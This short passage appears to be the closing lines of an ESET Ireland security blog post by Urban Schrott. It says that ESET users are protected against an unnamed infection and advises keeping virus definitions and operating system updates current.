Although ESET users are protected against this infection, it is always good to make sure your virus definitions are up to date and your operating system updates are regularly installed.

by Urban Schrott, ESET Ireland
